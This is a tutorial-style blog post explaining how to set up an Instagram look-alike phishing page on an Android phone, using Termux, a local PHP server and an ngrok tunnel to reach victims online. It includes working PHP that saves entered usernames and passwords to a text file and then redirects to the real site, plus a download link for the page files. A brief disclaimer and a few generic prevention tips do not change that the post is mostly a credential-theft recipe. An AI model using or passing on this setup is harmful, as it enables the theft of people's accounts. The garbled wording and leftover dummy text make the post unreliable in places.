Phishing is a kind of social engineering attack often used to steal user data, including login credentials. It happens once an assaulter, masquerading as a trusty entity, dupes a victim into gap an email, instant message, or text message. The recipient is then tricked into clicking a malicious link, which might cause the installation of malware and reveal their sensitive data.
So today's post will be about a phishing attack. Before getting started I hope you guys installed ngrok in your termux application because it plays a crucial role in this topic.
NOTE: This post is for educational purposes only. Do not try to misuse this. All the tests I have done on my phone.
Requirements:
1. Termux application in Android phone
2. Kick Web Server
3. Ngrok
Getting Started:
Firstly you have to made a web server in which you can store your PHP , HTML and CSS files. To do this I am using Kick web server application for android. It has built-in PHP-Myadmin. Everything is preconfigured and it is easy to install.
There is a folder in internal storage named as htdocs. Yes!! htdocs is the folder in which you have to keep your PHP and HTML files.
Step 1 : Turn on the Kick Web server.
Step 2 : See the below image. Click on the icon button where arrow is pointed and check the localhost is working properly.
Step 3 : When the localhost is running properly Open the Termux Application.
Step 4 : Type ./ngrok http 8080 and you will get this screen like this. Basically Ngrok will create a secure tunnel between two parties.
Step 5 : Now open the link on your browser. The link is provided by the Ngrok. Copy that link and paste it into your browser.
After completing these 5 steps you have your own web server in which you can store your files in htdocs folder. Even you can access those files through internet using ngrok link. Now the final part is how you can make a page so that victim click on that particular link and reach at your page.
Login.php
<?php
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://instagram.com');
exit();
?>
Index.php
<?php
header('Location: login.html');
exit();
?>
Here I have made instagram look a like phishing page. You can download two files. Click here to download:-https://my.pcloud.com/publink/show?code=XZRrh17Z8YnvGNfCXwVlTvLldGWaYREWiiRX
When you enter the username and password it will redirect to the instagram login page but it stores the username and password in usernames.txt file. As you can see before redirecting to insta page it store the values in text file.
6 ways to prevent from Phishing Attack:
- Use anti-malware software and keep them (along with system patches) up to date.
- Use multi-factor authentication.
- Never Enter Sensitive Information in a Pop Up Window or any unauthorised websites.
- Check the Source of Information From Incoming Mail.
- Never Go to Your Bank’s Website by Clicking on Links Included in Emails.
- Never Click on Hyperlinks in Email or any other social media platform.
Subscribe my News feed to get the latest post Updates.
Till Now Good Bye and Take Care.
My Facebook Page:https://www.facebook.com/beginnerstrackofficial/
My Linkedin Page:https://www.linkedin.com/in/beginners-track-a661331a8
My Twitter Page:https://twitter.com/beginnerstracko?s=09
My Instagram Page:https://www.instagram.com/beginnerstrackofficial/?hl=en
My Pinterest Page:https://www.pinterest.com/beginnerstrackofficial/
Author: ADITYA YADAV
I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.
1 Comments:
Click here for CommentsFabulous
ConversionConversion EmoticonEmoticon